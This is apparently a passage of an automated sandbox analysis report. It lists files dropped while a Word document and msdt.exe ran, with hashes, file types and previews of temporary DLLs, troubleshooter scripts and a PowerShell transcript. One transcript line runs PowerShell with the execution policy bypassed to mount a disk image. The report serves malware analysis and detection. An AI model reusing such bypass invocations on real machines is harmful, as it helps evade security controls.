                                                                                                                                                                    Preview:L...F..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP...............<J.P..7..0i.P.^..........4.......C:\Users\user\AppData\Local\Temp\RES5EDA.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c33guzif.vqh.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czf5qbdw.tlo.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.112696307080811
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4gak7YnqqJFPN5Dlq5J:+RI+ycuZhNWgakSJFPNnqX
                                                                                                                                                                    MD5:AE28F617D1FFD1E53C58048971653B59
                                                                                                                                                                    SHA1:E4B938A2DB3BDB740B687D7B62248FDA9642D6F3
                                                                                                                                                                    SHA-256:6939F02575AAD46613236498F5699D58DB56569DE5B2D84E69F4E474B0C8ECF9
                                                                                                                                                                    SHA-512:A44FB43DEAB5C6E43127B15FF62CA90C2DF7E2CE1D234C617C319587FAD5B9A0CA9E45ACD155C0389C6990223C42BA1BC9DF2160354460B016DFEB78A569944F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5120
                                                                                                                                                                    Entropy (8bit):3.7885132843835563
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:6ieoPhmKraYZkH8KTibUye2kwjj0JuC+CFSlwY0kc1ulWga3Jfq:1FDaAkHHos2k8FCubIgKJ
                                                                                                                                                                    MD5:3808E62600B7DD46185B68D58AE7D323
                                                                                                                                                                    SHA1:5F8F0D3D8F6CE2AC02D438924B81F71CAD7C021A
                                                                                                                                                                    SHA-256:327DD36754FC5F70ED43039BD6C7EF7340801B4AE9E004EEBEF3A56A6FD6D557
                                                                                                                                                                    SHA-512:C4C9693BB5C35D97821460C07A42864CDBF7FA29C9E8E85D44282371B5094B65CC58D9A1DA7272AC90A97E5EC8F8E81C3B23E70ACF764C5DD25D5F5FECFE6CD8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.0854106769117537
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygYak7YnqqxNPN5Dlq5J:+RI+ycuZhNdakSLPNnqX
                                                                                                                                                                    MD5:14C20B82F70526B3632A09A55058C733
                                                                                                                                                                    SHA1:68DCFB4051EF4BCECC41AD380D708F494F0E904F
                                                                                                                                                                    SHA-256:C9BE630A247C782FC2FD445F6DD9D5C5A40EB5574C3E9871ACFB3EE319B8FFB7
                                                                                                                                                                    SHA-512:C982B83F0297D87A0D26E8265C84BCE5F1AC502E3EF1269C9C14D19E9DCA592898C00EE3E8FC5C77F33C5C6B027535BA5FE2FC38F9CAA26FAC0336204335DDEA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9728
                                                                                                                                                                    Entropy (8bit):4.7977938003878045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:XXKqedmYoNKvUTCSH3gR8H8FgwSHwBmkwZYPaSJ365O9ieMjQZaoRnIjfK:KElNK8TCSfHyPmkwZ+vKOOQZdnv
                                                                                                                                                                    MD5:9B9920FB503945C91A7DF14BD1CFA79B
                                                                                                                                                                    SHA1:2F9D9780C738D818CFAE3054DBAB971FDC6C94A1
                                                                                                                                                                    SHA-256:68D8F18213236BE68BFA865047F501124F707CDF63A4D3C29A5824D83316AAC1
                                                                                                                                                                    SHA-512:82338C7A18E212B79CC1F8331BF91CFFA45312554235DD09BA27778F51AEDF874E59EDF2BA4EF971EAE79A5A256C09B657121B4554398E9FE05A8860BE1F1A4C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc276.LNK

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Archive, ctime=Mon Jun 6 08:04:14 2022, mtime=Tue Jun 7 10:38:53 2022, atime=Mon Jun 6 08:04:14 2022, length=10144, window=hide
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):290
                                                                                                                                                                    Entropy (8bit):3.6693833291173723
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:4xtYl/EYcL8x1618R/8p6P5FirRGlljsljAlAg+1CKMK/lt:8OEYcR18RUaiQ/jEjA6X/X
                                                                                                                                                                    MD5:36F7B1212F5C8D71F1F60E36676DB5AF
                                                                                                                                                                    SHA1:AB3581195A3C5910EDA5225B3531CC571A7DB176
                                                                                                                                                                    SHA-256:8143C2D057A3CDAE0DD8E184F8C0633CC43EBCC307B35A3F14B73BB73527C50D
                                                                                                                                                                    SHA-512:F013BEF37F29671303C18B4806CF3A411A930D30B325983C22DBA291828A602B7B82C2F414932FD775E93062EE242C986CC09F208BA950B54DEC7C78919F0E1D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:L..................F....!....;.d.y.....)cz...;.d.y...'...........................P.O. .:i.....+00.../E:\...................d.2..'...T.H!.DOC2#K_E.DOC..H.......T.H.T.\..............................d.o.c.2.7.6...d.o.c.x.......=...............-.......<.............L......E:\doc276.docx......

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):4.601202445739505
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:bDuMJlZepu4omxWKepu4ov:bCSKoy
                                                                                                                                                                    MD5:872838896A4E8A3CADC8379E015B14FC
                                                                                                                                                                    SHA1:049634CD63125E68CC2415079834E119411BAEB7
                                                                                                                                                                    SHA-256:B0B0E3A6D86FFFBDC4A9C3D5C4F9A74970EB8BADB80D21C3C84B90BF947C8330
                                                                                                                                                                    SHA-512:764E9502BB78477D72A12FF70E3141946AB5C938D137DD2F6E6D081B2C1E9644A5C921941A81189F1FFF4C42AF27D199347F4AEF42C5702FD56938F4BAACA30E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[folders]..Templates.LNK=0..doc276.LNK=0..[misc]..doc276.LNK=0..

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                    Entropy (8bit):2.5804269155138986
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Rl/ZdE2GHlmclWSRSLuRa4pL99l:RtZqkHSUIa+
                                                                                                                                                                    MD5:F5EEF03731758B35D82538F83E0D3469
                                                                                                                                                                    SHA1:53DE07E131F07113F83EC1D1F3E7B4BD7BC3483E
                                                                                                                                                                    SHA-256:F7F2EFEA3D45B034151A9C573176404DC88E18E1BA28D86387FB5C3F1916C97D
                                                                                                                                                                    SHA-512:D763F0667673EE9DD67AEB97F3AD0A77A0A647C3BA384F2144A3200581AF07BA47DA358F73D980D7F8936631F074E9A22A36B5374DF0F7FE78C7C927D2054D3C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.pratesh................................................p.r.a.t.e.s.h..........`...........{...................`.......}...}...}..............q`.......|...|...|..

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):20
                                                                                                                                                                    Entropy (8bit):2.8954618442383215
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                    MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                    SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                    SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                    SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                    C:\Users\user\Documents\20220607\PowerShell_transcript.468325.jUlojUo4.20220607192048.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1020
                                                                                                                                                                    Entropy (8bit):5.1299309249841665
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:BxSAhc7vBZ0x2DOXikR9uyeWjyHjeTKKjX4CIym1ZJXpxR9uy6nxSAZ6:BZh6vj0oOxjjyqDYB1ZvxOZZ6
                                                                                                                                                                    MD5:B9240629DC74189BF4659F00EA042651
                                                                                                                                                                    SHA1:4457AE6FAD21CEDC1A711A89912569E267D2C7FD
                                                                                                                                                                    SHA-256:44B367279577281597D08BAED307899B475E025E8EF9E1C2D3E52F4DB5CF9DA0
                                                                                                                                                                    SHA-512:F96D1F7E43A5D6575DEB73E9CE75027ACB295624CCD5585C7F20F41B62D5EE131655172A4DE273112AE1568ED7E44669D25A44CAE669A59938C795BFE2CCF4BF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220607192050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath C:\Users\user\Desktop\68101181_048154.img..Process ID: 6088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220607192050..**********************..PS>Mount-DiskImage -ImagePath C:\Users\user\Desktop\68101181_048154.img..**********************..Command start time: 20220607192547..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220607192547..****

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.diagpkg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):24702
                                                                                                                                                                    Entropy (8bit):4.37978533849437
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                    MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                    SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                    SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                    SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):66560
                                                                                                                                                                    Entropy (8bit):6.926109943059805
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                    MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                    SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                    SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                    SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):50242
                                                                                                                                                                    Entropy (8bit):4.932919499511673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                    MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                    SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                    SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                    SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16946
                                                                                                                                                                    Entropy (8bit):4.860026903688885
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                    MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                    SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                    SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                    SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):453
                                                                                                                                                                    Entropy (8bit):4.983419443697541
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                    MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                    SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                    SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                    SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\CL_LocalizationData.psd1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6650
                                                                                                                                                                    Entropy (8bit):3.6751460885012333
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
